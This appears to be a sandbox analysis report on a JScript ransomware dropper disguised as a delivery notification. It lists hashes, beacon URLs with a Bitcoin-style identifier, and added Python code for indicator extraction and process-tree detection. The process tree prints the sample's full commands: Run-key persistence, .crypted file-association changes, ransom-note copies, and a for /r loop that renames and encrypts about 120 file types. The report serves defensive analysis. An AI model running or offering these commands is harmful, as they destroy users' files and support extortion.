Analysis
- max time kernel: 119s
- max time network: 133s
- platform: windows10_x64
- resource: win10v20201028
- submitted: 15-01-2021 15:50

Static task: static1
Behavioral task: behavioral1
  Sample: Delivery_Notification_00896328.doc.js
  Resource: win7v20201028
Behavioral task: behavioral2
  Sample: Delivery_Notification_00896328.doc.js
  Resource: win10v20201028
General
- Target: Delivery_Notification_00896328.doc.js
- Size: 248KB
- MD5: 0168089428c6aa371f4275d0872b0970
- SHA1: d2595c0a40c4d8dcf9f7c711f472abc6ac0f592e
- SHA256: dc20c80a0c1db5848ceef6714c6d774f3002a0c595638aff0410ae2ddabb710a
- SHA512: 915d7a3f63429a27dace53418d8b3216ef3b4b6ac82d63ecca6f1590aa7380449fb4fe3ec8eed5a9aa3a8dadeed5ef32091ecdf2e885aca8d998d8150d07f418
Malware Config
Extracted from: C:\Users\Admin\AppData\Local\Temp\a.txt (the note the sample copies to the Desktop as DECRYPT.txt; hashed under Downloads below)
Identifier: 19bKG2PuU8s4kjfqBYepN3yTuuKC2NEQbZ (formatted like a Bitcoin P2PKH address; the same string is the a= parameter of every URL below)
URLs:
  http://ferroli-lietuva.eu/counter/?a=19bKG2PuU8s4kjfqBYepN3yTuuKC2NEQbZ
  http://georgina-collier.com/counter/?a=19bKG2PuU8s4kjfqBYepN3yTuuKC2NEQbZ
  http://firstshow.info/counter/?a=19bKG2PuU8s4kjfqBYepN3yTuuKC2NEQbZ
  http://gayathri.co.in/counter/?a=19bKG2PuU8s4kjfqBYepN3yTuuKC2NEQbZ
  http://jackroubaud.com/counter/?a=19bKG2PuU8s4kjfqBYepN3yTuuKC2NEQbZ
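Every URL in the extracted configuration has the same shape: a throwaway domain, the path /counter/, and one query parameter a= carrying the identifier above. The useful network indicators are therefore the five hosts plus the path-and-token shape, which also catches the same beacon sent to a domain that is not in this list. The Python below is an added example and not part of the sandbox report: the URL list is copied from the configuration above, the proxy log lines are constructed, and the base58 character class used for the token is an assumption drawn from the identifier's format.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Copied from the extracted configuration above.
CONFIG_URLS = [
    "http://ferroli-lietuva.eu/counter/?a=19bKG2PuU8s4kjfqBYepN3yTuuKC2NEQbZ",
    "http://georgina-collier.com/counter/?a=19bKG2PuU8s4kjfqBYepN3yTuuKC2NEQbZ",
    "http://firstshow.info/counter/?a=19bKG2PuU8s4kjfqBYepN3yTuuKC2NEQbZ",
    "http://gayathri.co.in/counter/?a=19bKG2PuU8s4kjfqBYepN3yTuuKC2NEQbZ",
    "http://jackroubaud.com/counter/?a=19bKG2PuU8s4kjfqBYepN3yTuuKC2NEQbZ",
]

# Assumption: the token uses the base58 alphabet (no 0, O, I, l), which is what
# the extracted identifier looks like. Widen the class if a later sample differs.
BEACON_PATH = re.compile(r"^/counter/\?a=[1-9A-HJ-NP-Za-km-z]{26,35}$")


def extract_indicators(urls):
    """Split the config URLs into distinct hosts, paths and a= tokens."""
    hosts, paths, tokens = set(), set(), set()
    for url in urls:
        parts = urlsplit(url)
        hosts.add(parts.hostname)
        paths.add(parts.path)
        tokens.update(parse_qs(parts.query).get("a", []))
    return {"hosts": sorted(hosts), "paths": sorted(paths), "tokens": sorted(tokens)}


def defang(url):
    """hxxp:// plus [.] in the host only, so the indicator is not clickable."""
    parts = urlsplit(url)
    scheme = parts.scheme.replace("http", "hxxp")
    host = parts.hostname.replace(".", "[.]")
    query = f"?{parts.query}" if parts.query else ""
    return f"{scheme}://{host}{parts.path}{query}"


# Constructed proxy log lines (Squid-like: timestamp, client, method, URL, status).
PROXY_LOG = """\
1610726000.101 10.0.0.12 GET http://ferroli-lietuva.eu/counter/?a=19bKG2PuU8s4kjfqBYepN3yTuuKC2NEQbZ 200
1610726001.455 10.0.0.12 GET http://example-cdn.test/static/app.js 200
1610726002.930 10.0.0.17 GET http://not-in-config.example/counter/?a=1AbCdEfGhJkLmNpQrStUvWxYz23456789 404
"""


def scan_proxy_log(log, indicators):
    """Flag requests to known hosts, and requests to any host with the beacon shape."""
    known = set(indicators["hosts"])
    hits = []
    for line in log.splitlines():
        _ts, client, _method, url, _status = line.split()
        parts = urlsplit(url)
        target = parts.path + (f"?{parts.query}" if parts.query else "")
        if parts.hostname in known:
            hits.append((client, defang(url), "known-host"))
        elif BEACON_PATH.match(target):
            hits.append((client, defang(url), "beacon-shape"))
    return hits


if __name__ == "__main__":
    ind = extract_indicators(CONFIG_URLS)
    for hit in scan_proxy_log(PROXY_LOG, ind):
        print(hit)
```

The third log line is the reason for the shape rule: the host is not in the extracted list, but the request path is the same counter beacon with a different token, which is exactly what a re-registered domain or a second campaign would look like.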
Signatures

Blocklisted process makes network request (8 IoCs)
  wscript.exe (PID 508) made network requests on flows 10, 11, 13, 15, 18, 20, 21 and 25.

Modifies extensions of user files (1 IoC)
  Ransomware generally changes the extension on encrypted files.
  cmd.exe: File renamed C:\Users\Admin\Pictures\UninstallSet.tiff => C:\Users\Admin\Pictures\UninstallSet.tiff.crypted

Reads user/profile data of web browsers (2 TTPs)
  Infostealers often target stored browser data, which can include saved credentials etc.
  (no IoCs listed)

Adds Run key to start application (2 TTPs, 2 IoCs)
  reg.exe: Key created \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
  reg.exe: Set value (str) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\Microsoft\Windows\CurrentVersion\Run\Crypted = "C:\\Users\\Admin\\AppData\\Local\\Temp\\a.txt"

Modifies registry class (7 IoCs)
  reg.exe: Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.crypted
  reg.exe: Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.crypted\ = "Crypted"
  reg.exe: Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Crypted\shell\open\command
  reg.exe: Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Crypted
  reg.exe: Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Crypted\shell
  reg.exe: Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Crypted\shell\open
  reg.exe: Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Crypted\shell\open\command\ = "notepad.exe \"C:\\Users\\Admin\\AppData\\Local\\Temp\\a.txt\""

Suspicious use of WriteProcessMemory (18 IoCs)
  Each parent-to-child write is logged twice; the nine distinct pairs are:
  Source PID  Source process  Target PID  Target process
  508         wscript.exe     3064        cmd.exe
  508         wscript.exe     3656        cmd.exe
  508         wscript.exe     2868        cmd.exe
  508         wscript.exe     2060        cmd.exe
  508         wscript.exe     4008        cmd.exe
  508         wscript.exe     2176        cmd.exe
  3064        cmd.exe         1232        reg.exe
  2868        cmd.exe         692         reg.exe
  3656        cmd.exe         1568        reg.exe
Processes

C:\Windows\system32\wscript.exe
  wscript.exe C:\Users\Admin\AppData\Local\Temp\Delivery_Notification_00896328.doc.js
  - Blocklisted process makes network request
  - Suspicious use of WriteProcessMemory

  C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Crypted" /t REG_SZ /F /D "C:\Users\Admin\AppData\Local\Temp\a.txt"
    - Suspicious use of WriteProcessMemory

    C:\Windows\system32\reg.exe
      REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Crypted" /t REG_SZ /F /D "C:\Users\Admin\AppData\Local\Temp\a.txt"
      - Adds Run key to start application

  C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c REG ADD "HKCR\.crypted" /ve /t REG_SZ /F /D "Crypted"
    - Suspicious use of WriteProcessMemory

    C:\Windows\system32\reg.exe
      REG ADD "HKCR\.crypted" /ve /t REG_SZ /F /D "Crypted"
      - Modifies registry class

  C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c REG ADD "HKCR\Crypted\shell\open\command" /ve /t REG_SZ /F /D "notepad.exe \"C:\Users\Admin\AppData\Local\Temp\a.txt\""
    - Suspicious use of WriteProcessMemory

    C:\Windows\system32\reg.exe
      REG ADD "HKCR\Crypted\shell\open\command" /ve /t REG_SZ /F /D "notepad.exe \"C:\Users\Admin\AppData\Local\Temp\a.txt\""
      - Modifies registry class

  C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c copy /y "C:\Users\Admin\AppData\Local\Temp\a.txt" "C:\Users\Admin\AppData\Roaming\Desktop\DECRYPT.txt"

  C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c copy /y "C:\Users\Admin\AppData\Local\Temp\a.txt" "C:\Users\Admin\Desktop\DECRYPT.txt"

  C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c for /r "C:\" %i in (*.zip *.rar *.r00 *.r01 *.r02 *.r03 *.7z *.tar *.gz *.gzip *.arc *.arj *.bz *.bz2 *.bza *.bzip *.bzip2 *.ice *.xls *.xlsx *.doc *.docx *.pdf *.djvu *.fb2 *.rtf *.ppt *.pptx *.pps *.sxi *.odm *.odt *.mpp *.ssh *.pub *.gpg *.pgp *.kdb *.kdbx *.als *.aup *.cpr *.npr *.cpp *.bas *.asm *.cs *.php *.pas *.class *.py *.pl *.h *.vb *.vcproj *.vbproj *.java *.bak *.backup *.mdb *.accdb *.mdf *.odb *.wdb *.csv *.tsv *.sql *.psd *.eps *.cdr *.cpt *.indd *.dwg *.ai *.svg *.max *.skp *.scad *.cad *.3ds *.blend *.lwo *.lws *.mb *.slddrw *.sldasm *.sldprt *.u3d *.jpg *.jpeg *.tiff *.tif *.raw *.avi *.mpg *.mp4 *.m4v *.mpeg *.mpe *.wmf *.wmv *.veg *.mov *.3gp *.flv *.mkv *.vob *.rm *.mp3 *.wav *.asf *.wma *.m3u *.midi *.ogg *.mid *.vdi *.vmdk *.vhd *.dsk *.img *.iso) do (REN "%i" "%~nxi.crypted" & call C:\Users\Admin\AppData\Local\Temp\a0.exe "%i.crypted" 2el84e983wl76brdq89zescdizbgcy3hvihx)
    - Modifies extensions of user files
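The process tree above is the chain a host-based detection should catch before the rename loop gets far: a script host (wscript.exe) spawning cmd.exe; reg.exe writing a Run value that points at a .txt rather than an executable, so what re-opens at logon is the note in its registered handler, not code; HKCR writes that bind the new .crypted extension to "notepad.exe" with the note; two copies of the note onto the Desktop; and a `for /r` loop that appends .crypted to every matching file and hands the renamed path plus a fixed token to a0.exe (whose role the report does not show). The Python below is an added example, not part of the sandbox report: the events are constructed from the command lines shown above (the extension list is abridged, and the pairing of each cmd.exe command line with a PID follows the order of the tree and is an assumption), and the rules are illustrative rather than a vendor signature set.

```python
import re
from dataclasses import dataclass


@dataclass(frozen=True)
class ProcEvent:
    pid: int
    ppid: int
    image: str      # full image path, as a process-creation event records it
    cmdline: str


WSCRIPT = r"C:\Windows\system32\wscript.exe"
CMD = r"C:\Windows\system32\cmd.exe"
REG = r"C:\Windows\system32\reg.exe"
NOTE = r"C:\Users\Admin\AppData\Local\Temp\a.txt"

# Constructed events modelled on the report's process tree. PIDs are the ones
# listed under WriteProcessMemory; which cmd.exe PID carried which command line
# is assumed from the order of the tree. The for /r extension list is abridged
# (the real sample enumerates about 120 extensions).
EVENTS = [
    ProcEvent(508, 4, WSCRIPT, r"wscript.exe C:\Users\Admin\AppData\Local\Temp\Delivery_Notification_00896328.doc.js"),
    ProcEvent(3064, 508, CMD, rf'"{CMD}" /c REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Crypted" /t REG_SZ /F /D "{NOTE}"'),
    ProcEvent(1232, 3064, REG, rf'REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Crypted" /t REG_SZ /F /D "{NOTE}"'),
    ProcEvent(3656, 508, CMD, rf'"{CMD}" /c REG ADD "HKCR\.crypted" /ve /t REG_SZ /F /D "Crypted"'),
    ProcEvent(1568, 3656, REG, r'REG ADD "HKCR\.crypted" /ve /t REG_SZ /F /D "Crypted"'),
    ProcEvent(2868, 508, CMD, rf'"{CMD}" /c REG ADD "HKCR\Crypted\shell\open\command" /ve /t REG_SZ /F /D "notepad.exe \"{NOTE}\""'),
    ProcEvent(692, 2868, REG, rf'REG ADD "HKCR\Crypted\shell\open\command" /ve /t REG_SZ /F /D "notepad.exe \"{NOTE}\""'),
    ProcEvent(2060, 508, CMD, rf'"{CMD}" /c copy /y "{NOTE}" "C:\Users\Admin\AppData\Roaming\Desktop\DECRYPT.txt"'),
    ProcEvent(4008, 508, CMD, rf'"{CMD}" /c copy /y "{NOTE}" "C:\Users\Admin\Desktop\DECRYPT.txt"'),
    ProcEvent(2176, 508, CMD, rf'"{CMD}" /c for /r "C:\" %i in (*.zip *.rar *.7z *.xls *.xlsx *.doc *.docx *.pdf '
                              r'*.ssh *.pub *.gpg *.kdbx *.sql *.jpg *.vmdk *.iso) do (REN "%i" "%~nxi.crypted" & '
                              r'call C:\Users\Admin\AppData\Local\Temp\a0.exe "%i.crypted" 2el84e983wl76brdq89zescdizbgcy3hvihx)'),
]

SCRIPT_HOSTS = {"wscript.exe", "cscript.exe", "mshta.exe", "powershell.exe"}
EXEC_EXTS = (".exe", ".dll", ".com", ".bat", ".cmd", ".vbs", ".js", ".ps1", ".scr")
RE_REG_ADD = re.compile(r'\breg(?:\.exe)?\s+add\s+"?([^"\s]+)', re.I)
RE_REG_DATA = re.compile(r'/d\s+"((?:[^"\\]|\\.)*)"', re.I)     # honours \" inside the value
RE_NOTE_COPY = re.compile(r'\bcopy\b.*\\Desktop\\[^"]+\.txt"', re.I)
RE_FOR_EXTS = re.compile(r'\bfor\s+/r\b.*?\bin\s*\(([^)]*)\)', re.I | re.S)
RE_REN = re.compile(r'\bren\s+"%i"\s+"%~nxi(\.[A-Za-z0-9]+)"', re.I)
RE_HELPER = re.compile(r'\bcall\s+(\S+\.exe)\b', re.I)


def image_name(path):
    return path.rsplit("\\", 1)[-1].lower()


def analyze(events):
    """Return one finding dict per matched rule; a process may trigger several."""
    by_pid = {e.pid: e for e in events}
    findings = []
    for ev in events:
        name = image_name(ev.image)
        parent = by_pid.get(ev.ppid)
        if name == "cmd.exe" and parent and image_name(parent.image) in SCRIPT_HOSTS:
            findings.append({"rule": "script_host_spawns_shell", "pid": ev.pid,
                             "parent": image_name(parent.image)})
        m = RE_REG_ADD.search(ev.cmdline) if name == "reg.exe" else None
        if m:
            key = m.group(1)
            data = RE_REG_DATA.search(ev.cmdline)
            value = data.group(1) if data else ""
            if re.search(r"\\CurrentVersion\\Run\b", key, re.I):
                # A non-executable here is opened by its registered handler at
                # logon (Notepad for .txt): persistence of the note, not of code.
                findings.append({"rule": "run_key_persistence", "pid": ev.pid, "key": key,
                                 "data": value,
                                 "non_executable": not value.lower().endswith(EXEC_EXTS)})
            elif re.match(r"(HKCR|HKEY_CLASSES_ROOT)\\", key, re.I):
                findings.append({"rule": "file_association_change", "pid": ev.pid,
                                 "key": key, "data": value})
        if name == "cmd.exe":
            if RE_NOTE_COPY.search(ev.cmdline):
                findings.append({"rule": "note_dropped_on_desktop", "pid": ev.pid})
            exts, ren = RE_FOR_EXTS.search(ev.cmdline), RE_REN.search(ev.cmdline)
            if exts and ren:
                helper = RE_HELPER.search(ev.cmdline)
                findings.append({"rule": "mass_rename_loop", "pid": ev.pid,
                                 "suffix": ren.group(1),
                                 "extensions": re.findall(r"\*\.([A-Za-z0-9]+)", exts.group(1)),
                                 "helper": helper.group(1) if helper else None})
    return findings


if __name__ == "__main__":
    for finding in analyze(EVENTS):
        print(finding)
```

Two details worth carrying into a production rule: the Run value is flagged because it points at a non-executable, and the HKCR keys in this run landed under \REGISTRY\MACHINE\SOFTWARE\Classes, which means the sandbox executed the sample with administrative rights. New keys written through HKCR go to HKLM\Software\Classes, so on a standard-user host those two REG ADD calls would normally be denied, while the HKCU Run value, the Desktop copies and the rename of files the user can write would still succeed; a rule that waits for the HKCR change would miss that case.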
Network
MITRE ATT&CK Matrix (ATT&CK v6)
Downloads

C:\Users\Admin\AppData\Local\Temp\a.txt
  MD5    512ad548377714262b373c665f17d1db
  SHA1   0f05efd559b90eb77418c32fa86cfcba77b6e187
  SHA256 27966b12ff9831318138b9cf663fd8e25e9469c347fe630a2c6a491bf125e2ca
  SHA512 f0e7456eccd513a3b09ffe1411ba661716d37efeff6cdd06b00e7859c935655a0eb5e0d75deef9f56985ff360f41e61b8f2eefa819d0677c8aa72cfb2a788943

C:\Users\Admin\AppData\Local\Temp\a0.exe
  MD5    7c7ff5fdc3cc7705f4d42ec4e3eab8a5
  SHA1   98416dfe3086b4dfb2cbc8170b01e292ef30d982
  SHA256 dc20be27348645f896c30914b3cbc66cdc7160702d3f307d3b1669095f483b27
  SHA512 77fee3199567ff012dd5f617b620bbcbd5eefb940a795063e42cdaa8b2d224e810d16ce7b88544c5a429f75f9c7a9434613be4276097a8a05d9ec7fa4daab9e9

Memory dumps
  memory/692-10-0x0000000000000000-mapping.dmp
  memory/1232-9-0x0000000000000000-mapping.dmp
  memory/1568-11-0x0000000000000000-mapping.dmp
  memory/2060-5-0x0000000000000000-mapping.dmp
  memory/2176-7-0x0000000000000000-mapping.dmp
  memory/2868-4-0x0000000000000000-mapping.dmp
  memory/3064-2-0x0000000000000000-mapping.dmp
  memory/3656-3-0x0000000000000000-mapping.dmp
  memory/4008-6-0x0000000000000000-mapping.dmp